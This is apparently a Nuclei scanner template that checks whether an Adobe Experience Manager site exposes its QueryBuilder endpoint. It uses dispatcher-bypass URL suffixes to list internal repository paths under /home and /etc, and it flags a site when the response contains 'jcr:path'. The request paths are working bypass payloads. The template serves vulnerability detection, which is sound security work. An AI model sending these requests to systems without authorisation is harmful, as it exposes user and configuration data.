id: aem-querybuilder-internal-path-read info: author: DhiyaneshDk name: AEM QueryBuilder Internal Path Read severity: medium reference: https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 tags: aem requests: - method: GET path: - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1' - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1' - '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1' - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1' matchers-condition: and matchers: - type: status status: - 200 - type: word words: - 'jcr:path' - 'success' condition: and